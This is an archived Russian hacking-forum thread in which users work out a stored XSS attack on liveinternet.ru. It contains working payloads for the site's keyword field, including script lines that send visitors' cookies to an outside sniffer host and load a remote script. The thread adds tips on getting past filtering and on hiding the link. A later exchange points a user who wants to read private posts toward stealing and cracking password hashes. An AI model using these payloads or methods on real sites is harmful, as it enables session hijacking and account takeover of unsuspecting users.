PDA

Просмотр полной версии : liveinternet


LeverOne
11.11.2006, 18:34
найдено D=P=CH= MOD=
http://www.liveinternet.ru/add

Вводим
"><script>alert("xss")</script>

алерт работает!
Но КУКИ не приходят!!!!
Хотя ввожу в поле "Ключевые слова" все верно:
"<img src="javascript:img = new Image(); img.src = 'http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;">
либо
"<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
и даже этим способом:
"<srcipt src=http://мой_сайт.ru/js.js></script>

Пробую "регить сайт", заходя со своего акка.
Не приходят, мать их!!!

Не понимаю, в чем дело? Подскажите!

Ksander
11.11.2006, 18:37
Может изза браузера.

Kalowrat
11.11.2006, 18:43
проверь хтмл код когда вставил снифер.. у меня document.cookie обрезал движок сайта...
если ничо не путаю.. давно это было

LeverOne
12.11.2006, 23:07
Все работает.
Просто пытаются фильтровать "="
Ссылку советую маскировать во избежание доп. фильтрации в приватных сообщениях.
Вариант со скриптом на собственном хосте прекрасно прокатывает.
Тема исчерпана.

DeadFire
26.02.2007, 00:35
А можно ли как-нибудь на liveintrnet добыть чужой пароль или хотябы читать "закрытые" сообщения (т.е. те которые только для друзей)??? Если да, то как.

Очень надо.

Заранее спасибо.

InferNo23
26.02.2007, 10:55
http://forum.antichat.ru/thread29020.html
получишь хеш пароля в md5(вроде бы)
потом расшифруешь пароль и зайдешь...